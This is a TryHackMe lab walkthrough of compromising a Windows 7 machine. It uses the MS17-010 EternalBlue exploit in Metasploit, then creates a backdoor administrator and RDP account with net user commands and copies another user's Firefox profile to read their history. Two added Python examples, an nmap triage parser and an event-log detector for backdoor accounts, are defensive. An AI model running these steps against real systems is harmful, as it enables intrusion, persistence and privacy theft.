Pepega Energy Walkthrough

Try Hack Me - Pepega Energy

As usual we start with an nmap scan (default scripts, version detection, TCP connect scan, normal output to a file): nmap -sCVT -oN nmap.out

135/tcp   open  msrpc              syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server? syn-ack
|_ssl-date: 2020-06-09T12:16:34+00:00; +2s from scanner time.
5357/tcp  open  http               syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
9001/tcp  open  tcpwrapped         syn-ack
49152/tcp open  msrpc              syn-ack Microsoft Windows RPC
49153/tcp open  msrpc              syn-ack Microsoft Windows RPC
49154/tcp open  msrpc              syn-ack Microsoft Windows RPC
49155/tcp open  msrpc              syn-ack Microsoft Windows RPC
49159/tcp open  msrpc              syn-ack Microsoft Windows RPC
49160/tcp open  msrpc              syn-ack Microsoft Windows RPC
Service Info: Host: PEPEGAENERGY-01; OS: Windows; CPE: cpe:/o:microsoft:windows

Looks like this is a Windows machine with SMB enabled, and since it is an older version of Windows (the banner on 445 says Windows 7 SP1) we should run some more checks. We can list the NSE scripts that ship with nmap with the following command: locate nse | grep smb, which gives us the SMB-related scripts we can run. So let's run all the smb-vuln scripts (the glob is quoted so the shell passes it to nmap untouched): nmap --script "smb-vuln*" -p 445

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|     Disclosure date: 2017-03-14
|     References:
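Scan output like this is exactly what a defender gets back when they run the same check against their own estate, so here is a small triage parser, added as an example for this walkthrough (it is not part of the original post or of nmap itself). It reads nmap's normal output, pulls the port table and the host-script block apart, and ranks what it finds. The embedded scan text is a trimmed copy of the results above; the severity labels, the remediation notes and the end-of-life check are assumptions of mine, not anything nmap reports.

```python
"""Triage nmap -oN output into ranked findings (added example, not from the post)."""
import re
from dataclasses import dataclass

# Constructed sample: trimmed from the scan output in the walkthrough.
SAMPLE_NMAP_OUTPUT = """\
135/tcp   open  msrpc              syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds       syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server? syn-ack
|_ssl-date: 2020-06-09T12:16:34+00:00; +2s from scanner time.
5357/tcp  open  http               syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: PEPEGAENERGY-01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
"""

@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str

# port/proto  state  service  [reason]  [version text]
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Reason tokens nmap prints with --reason / -vv; they are not part of the version string.
REASON_TOKENS = {"syn-ack", "conn-refused", "reset", "no-response", "udp-response"}
# A host-script header is "| name:" or "|_name:" with the name flush after the bar;
# indented lines such as "|     State: ..." belong to the current script.
SCRIPT_HEADER_RE = re.compile(r"^\|(?:_| )([\w-]+):\s*(.*)$")
STATE_RE = re.compile(r"\bState:\s*(\S+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

# Assumed severities and notes for exposed services (my labels, not nmap's).
EXPOSURE_NOTES = {
    445: ("medium", "SMB reachable: confirm SMBv1 is disabled and MS17-010 is installed"),
    3389: ("medium", "RDP reachable: review Remote Desktop Users membership and require NLA"),
    139: ("low", "NetBIOS session service reachable: usually redundant next to 445"),
}
RANK = {"critical": 0, "high": 1, "medium": 2, "low": 3}

def parse_ports(text):
    """Return one PortEntry per port line, with any reason token stripped from the version."""
    entries = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if not m:
            continue
        port, proto, state, service, rest = m.groups()
        head, _, tail = rest.partition(" ")
        if head in REASON_TOKENS:
            rest = tail
        entries.append(PortEntry(int(port), proto, state, service, rest.strip()))
    return entries

def parse_host_scripts(text):
    """Return {script_name: {description, state, cves}} from the 'Host script results' block."""
    scripts, current, in_block = {}, None, False
    for line in text.splitlines():
        if line.startswith("Host script results:"):
            in_block = True
            continue
        if not in_block or not line.startswith("|"):
            current = None
            continue
        m = SCRIPT_HEADER_RE.match(line)
        if m:
            current = m.group(1)
            scripts[current] = {"description": m.group(2).strip(), "state": None, "cves": []}
            continue
        if current is None:
            continue
        body = line.lstrip("|_ ").strip()
        entry = scripts[current]
        if ":" not in body and not entry["description"]:
            entry["description"] = body  # first free-text line of the block
        s = STATE_RE.search(body)
        if s:
            entry["state"] = s.group(1)
        entry["cves"].extend(CVE_RE.findall(body))
    return scripts

def triage(text):
    """Combine port exposure and NSE results into (severity, message) tuples, worst first."""
    findings = []
    for p in parse_ports(text):
        if p.state != "open":
            continue
        if p.port in EXPOSURE_NOTES:
            sev, note = EXPOSURE_NOTES[p.port]
            findings.append((sev, f"{p.port}/{p.proto} {note}"))
        if "Windows 7" in p.version or "Windows XP" in p.version:
            findings.append(("high", f"{p.port}/{p.proto} banner reports an end-of-life OS: {p.version}"))
    for name, info in parse_host_scripts(text).items():
        if info["state"] == "VULNERABLE":
            cves = ", ".join(info["cves"]) or "no CVE listed"
            findings.append(("critical", f"{name}: {info['description']} [{cves}]"))
    findings.sort(key=lambda f: RANK[f[0]])
    return findings

if __name__ == "__main__":
    for severity, message in triage(SAMPLE_NMAP_OUTPUT):
        print(f"[{severity.upper():8}] {message}")
```

Run against a real -oN file (read it in place of SAMPLE_NMAP_OUTPUT) the critical line is the one to act on first: an SMBv1 server that the ms17-010 check reports as VULNERABLE has not had the March 2017 patch applied, and on a box this old the sensible fix is both installing it and turning SMBv1 off.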

Jackpot! The machine is vulnerable to MS17-010, so this should be easy with Metasploit: fire up msfconsole, search for ms17-010 and use the exploit/windows/smb/ms17_010_eternalblue module. Set the payload to windows/x64/meterpreter/reverse_tcp, fill in RHOSTS and LHOST with the right IPs and run the exploit. We should be greeted with a nice WIN message and a meterpreter shell:


And if we run getuid we can see we are SYSTEM! Job done, we own the box, so let's start the hunt for flags!

We can drop into a local shell with the shell command and run net users to see all the user accounts on the system. Awesome, now let's find out some more about the users and run net user Zachary. From the output we can see this user is in the Administrators group. So let's do the same for Timmy: looks like Timmy is in the Remote Desktop Users group! And since we are SYSTEM we could just change his password and log in, but let's try to be less destructive and create our own user with the following command: net user monokuma password /add

Then add this user to the Remote Desktop Users group: net localgroup "Remote Desktop Users" monokuma /add and to the Administrators group: net localgroup "Administrators" monokuma /add. With all that, we should be able to connect to the computer over RDP: xfreerdp /u:monokuma /p:password /v:
[screenshot: Oops]
So now that we are on the computer we can start looking around in all the folders, and since we are an Administrator, screens like these won't stop us! Have a look at the files on every user's desktop; you will find everything you need!
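Every step in that sequence lands in the Windows Security log: account creation is event 4720, adding a member to a local group is 4732, and an RDP session shows up as 4624 with LogonType 10. The detection below, added as an example for this walkthrough and not part of the original post, correlates those three into one alert when they happen to the same account inside a short window, and still flags a lone privileged-group change for review. The event records are constructed: the host name is the one from the scan, but the timestamps, the 10.10.14.3 source address, the field names and the assumption that a SYSTEM-context shell appears as the computer account (PEPEGAENERGY-01$) are mine; in practice the records would come from a Security log export or a SIEM.

```python
"""Correlate account creation, privileged local-group changes and RDP logons
(added example for this walkthrough; event IDs are the standard Windows ones)."""
from dataclasses import dataclass
from datetime import datetime, timedelta

USER_CREATED = 4720               # A user account was created
LOCAL_GROUP_MEMBER_ADDED = 4732   # A member was added to a security-enabled local group
LOGON = 4624                      # An account was successfully logged on
RDP_LOGON_TYPE = 10               # LogonType 10 = RemoteInteractive (RDP)

PRIVILEGED_LOCAL_GROUPS = {"Administrators", "Remote Desktop Users"}

# Constructed sample records (host name from the scan; everything else invented).
SAMPLE_EVENTS = [
    {"time": "2020-06-08T15:00:00", "id": 4732, "subject": "Zachary",
     "target": "Timmy", "group": "Remote Desktop Users"},
    {"time": "2020-06-09T09:00:00", "id": 4624, "target": "Timmy", "logon_type": 2},
    {"time": "2020-06-09T12:20:01", "id": 4720, "subject": "PEPEGAENERGY-01$", "target": "monokuma"},
    {"time": "2020-06-09T12:20:15", "id": 4732, "subject": "PEPEGAENERGY-01$",
     "target": "monokuma", "group": "Remote Desktop Users"},
    {"time": "2020-06-09T12:20:30", "id": 4732, "subject": "PEPEGAENERGY-01$",
     "target": "monokuma", "group": "Administrators"},
    {"time": "2020-06-09T12:22:05", "id": 4624, "target": "monokuma",
     "logon_type": 10, "source_ip": "10.10.14.3"},
]

@dataclass
class Alert:
    severity: str
    user: str
    detail: str

SEVERITY_ORDER = ["critical", "high", "medium"]

def detect_backdoor_accounts(events, window=timedelta(hours=1)):
    """Return alerts, worst first.

    critical: account created, added to a privileged local group and used over RDP within `window`
    high:     created and added to a privileged local group within `window`, no RDP logon yet
    medium:   privileged local-group addition not tied to a fresh account (review it)
    """
    ordered = sorted(events, key=lambda e: e["time"])  # ISO-8601 strings sort chronologically
    tracked = {}   # newly created user -> creation details gathered so far
    alerts = []
    for e in ordered:
        t = datetime.fromisoformat(e["time"])
        user = e["target"]
        if e["id"] == USER_CREATED:
            tracked[user] = {"created": t, "by": e.get("subject", "?"), "groups": [], "rdp": None}
        elif e["id"] == LOCAL_GROUP_MEMBER_ADDED and e.get("group") in PRIVILEGED_LOCAL_GROUPS:
            rec = tracked.get(user)
            if rec and t - rec["created"] <= window:
                rec["groups"].append(e["group"])
            else:
                alerts.append(Alert("medium", user,
                    f"added to {e['group']} by {e.get('subject', '?')}; verify this was an approved change"))
        elif e["id"] == LOGON and e.get("logon_type") == RDP_LOGON_TYPE:
            rec = tracked.get(user)
            # Only the first RDP logon after the group change is recorded on the chain.
            if rec and rec["groups"] and rec["rdp"] is None and t - rec["created"] <= window:
                rec["rdp"] = (t, e.get("source_ip", "?"))
    for user, rec in tracked.items():
        if not rec["groups"]:
            continue
        detail = (f"created by {rec['by']} at {rec['created'].isoformat()} and added to "
                  f"{', '.join(rec['groups'])} within {window}")
        if rec["rdp"]:
            t, ip = rec["rdp"]
            alerts.append(Alert("critical", user, f"{detail}; first RDP logon from {ip} at {t.isoformat()}"))
        else:
            alerts.append(Alert("high", user, detail))
    alerts.sort(key=lambda a: SEVERITY_ORDER.index(a.severity))
    return alerts

if __name__ == "__main__":
    for a in detect_backdoor_accounts(SAMPLE_EVENTS):
        print(f"[{a.severity.upper():8}] {a.user}: {a.detail}")
```

The window is deliberately generous: an attacker who scripts the three commands finishes in seconds, while a legitimate onboarding usually spreads creation and group changes over longer and is done by a named administrator rather than the machine account, which is a second signal worth adding once the subject field is available from your log source.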

Now for our next trick: we would like to see what their browser history looks like. First we need to enable showing hidden files in Explorer, since AppData is hidden by default:


Now if we go to C:\Users\Timmy\AppData\Roaming there is a folder named Mozilla; let's copy this folder and place it in our own AppData\Roaming:


Now if we open Firefox and look at the history with Ctrl+H:


We can see exactly what Timmy has been up to; now we can do the same for Zachary:


There we have it! A system owned and the passwords for users still in place!